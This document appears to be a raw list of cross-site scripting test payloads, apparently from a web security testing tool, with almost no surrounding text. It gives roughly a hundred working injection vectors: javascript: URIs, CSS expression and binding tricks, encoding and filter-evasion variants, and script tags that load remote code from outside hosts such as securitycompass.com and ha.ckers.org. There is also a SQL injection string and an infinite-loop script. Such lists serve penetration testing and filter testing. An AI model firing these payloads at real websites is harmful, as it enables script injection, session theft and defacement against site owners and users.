<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> |
link |
<IFRAME SRC="javascript:document.vulnerable=true;"></iframe> |
link |
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> |
link |
<table BACKGROUND="javascript:document.vulnerable=true;"> |
link |
<table><TD BACKGROUND="javascript:document.vulnerable=true;"> |
link |
<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> |
link |
<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> |
link |
<div STYLE="width: expression(document.vulnerable=true);"> |
link |
<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> |
link |
<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> |
link |
<XSS STYLE="xss:expression(document.vulnerable=true)"> |
link |
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> |
link |
<style TYPE="text/javascript">document.vulnerable=true;</style> |
link |
<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> |
link |
<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> |
link |
<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> |
link |
<base HREF="javascript:document.vulnerable=true;//"> |
link |
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> |
link |
<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> |
link |
<a href="javascript#document.vulnerable=true;"> |
link |
<div onmouseover="document.vulnerable=true;"> |
link |
<img src="javascript:document.vulnerable=true;"> |
link |
<img dynsrc="javascript:document.vulnerable=true;"> |
link |
<input type="image" dynsrc="javascript:document.vulnerable=true;"> |
link |
<bgsound src="javascript:document.vulnerable=true;"> |
link |
&<script>document.vulnerable=true;</script> |
link |
&{document.vulnerable=true;}; |
link |
<img src=&{document.vulnerable=true;};> |
link |
<link rel="stylesheet" href="javascript:document.vulnerable=true;"> |
link |
<iframe src="vbscript:document.vulnerable=true;"> |
link |
<img src="mocha:document.vulnerable=true;"> |
link |
<img src="livescript:document.vulnerable=true;"> |
link |
<a href="about:<script>document.vulnerable=true;</script>"> |
link |
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> |
link |
<body onload="document.vulnerable=true;"> |
link |
<div style="background-image: url(javascript:document.vulnerable=true;);"> |
link |
<div style="behaviour: url([link to code]);"> |
link |
<div style="binding: url([link to code]);"> |
link |
<div style="width: expression(document.vulnerable=true;);"> |
link |
<style type="text/javascript">document.vulnerable=true;</style> |
link |
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> |
link |
<style><!--</style><script>document.vulnerable=true;//--></script> |
link |
<<script>document.vulnerable=true;</script> |
link |
<![<!--]]<script>document.vulnerable=true;//--></script> |
link |
<!-- -- --><script>document.vulnerable=true;</script><!-- -- --> |
link |
<img src="blah"onmouseover="document.vulnerable=true;"> |
link |
<img src="blah>" onmouseover="document.vulnerable=true;"> |
link |
<xml src="javascript:document.vulnerable=true;"> |
link |
<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> |
link |
<div datafld="b" dataformatas="html" datasrc="#X"></div> |
link |
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> |
link |
<style>@import'http://www.securitycompass.com/xss.css';</style> |
link |
<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> |
link |
<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> |
link |
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> |
link |
<script SRC="http://www.securitycompass.com/xss.jpg"></script> |
link |
<script a=">" SRC="http://www.securitycompass.com/xss.js"></script> |
link |
<script =">" SRC="http://www.securitycompass.com/xss.js"></script> |
link |
<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> |
link |
<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> |
link |
<script a=`>`SRC="http://www.securitycompass.com/xss.js"></script> |
link |
<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> |
link |
<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> |
link |
<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] |
link |
";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; |
link |
<;/script>;<;script>;alert(1)<;/script>; |
link |
<;scrscriptipt>;alert(1)<;/scrscriptipt>; |
link |
<;br size=\";&;{alert('XSS')}\";>; |
link |
perl -e 'print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;' >; out |
link |
perl -e 'print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;' >; out |
link |
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> |
link |
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> |
link |
<~/XSS STYLE=xss:expression(alert('XSS'))> |
link |
"><script>alert('XSS')</script> |
link |
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> |
link |
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> |
link |
XSS STYLE=xss:e/**/xpression(alert('XSS'))> |
link |
</XSS STYLE=xss:expression(alert('XSS'))> |
link |
"><STYLE>@import"javascript:alert('XSS')";</STYLE> |
link |
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> |
link |
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' |
link |
'';!--"<XSS>=&{()} |
link |
<IMG SRC=JaVaScRiPt:alert("XSS<WBR>")> |
link |
<IMG SRC="jav
ascript:alert(<WBR>'XSS');"> |
link |
<IMG SRC="jav
ascript:alert(<WBR>'XSS');"> |
link |
<![CDATA[<script>var n=0;while(true){n++;}</script>]]> |
link |
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof> |
link |
<script>alert('XSS')</script> |
link |
%22%3e%3cscript%3ealert('XSS')%3c/script%3e |
link |
<IMG SRC=javascript:alert("XSS")> |
link |
<IMG SRC=javascript:alert('XSS')> |
link |
<img src=xss onerror=alert(1)> |
link |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> |
link |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> |
link |
<IMG SRC="jav	ascript:alert('XSS');"> |
link |
<BODY BACKGROUND="javascript:alert('XSS')"> |
link |
<BODY ONLOAD=alert('XSS')> |
link |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> |
link |
<iframe src=http://ha.ckers.org/scriptlet.html < |
link |
%253cscript%253ealert(1)%253c/script%253e |
link |
"><s"%2b"cript>alert(document.cookie)</script> |
link |
foo<script>alert(1)</script> |
link |
<scr<script>ipt>alert(1)</scr</script>ipt> |
link |
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> |
link |
<marquee onstart='javascript:alert('1');'>=(◕_◕)= |
link |